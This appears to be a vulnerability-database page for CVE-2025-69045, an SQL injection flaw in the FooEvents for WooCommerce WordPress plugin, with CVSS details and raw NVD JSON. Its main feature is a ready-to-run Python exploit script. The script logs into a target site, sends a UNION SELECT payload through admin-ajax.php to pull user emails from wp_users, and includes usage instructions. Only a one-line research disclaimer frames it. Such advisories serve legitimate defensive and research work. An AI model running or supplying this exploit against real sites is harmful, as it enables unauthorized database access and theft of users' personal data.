Security Vulnerability Report
中文
CVE-2025-69045 CVSS 8.5 HIGH

CVE-2025-69045

Published: 2026-01-22 17:16:18
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FooEvents FooEvents for WooCommerce fooevents allows SQL Injection.This issue affects FooEvents for WooCommerce: from n/a through <= 1.20.4.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

FooEvents for WooCommerce < 1.20.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69045 SQL Injection PoC for FooEvents for WooCommerce # Target: WordPress site with FooEvents plugin <= 1.20.4 def exploit_sql_injection(target_url, username, password): """ Exploit SQL injection in FooEvents for WooCommerce plugin This PoC demonstrates extracting user emails from the database """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) # Check if login successful if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # SQL Injection via FooEvents AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Malicious SQL payload - extract user emails sql_payload = "1' UNION SELECT 1,user_email,3,4,5,6,7 FROM wp_users-- -" exploit_data = { 'action': 'fooevents_load_event_data', 'event_id': sql_payload } try: resp = session.post(ajax_url, data=exploit_data, timeout=10) if resp.status_code == 200: print("[+] SQL Injection payload sent") print(f"[>] Response: {resp.text[:500]}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print("Example: python exploit.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_sql_injection(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69045", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:17.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FooEvents FooEvents for WooCommerce fooevents allows SQL Injection.This issue affects FooEvents for WooCommerce: from n/a through <= 1.20.4."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en FooEvents FooEvents para WooCommerce fooevents permite Inyección SQL. Este problema afecta a FooEvents para WooCommerce: desde n/a hasta &lt;= 1.20.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fooevents/vulnerability/wordpress-fooevents-for-woocommerce-plugin-1-20-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}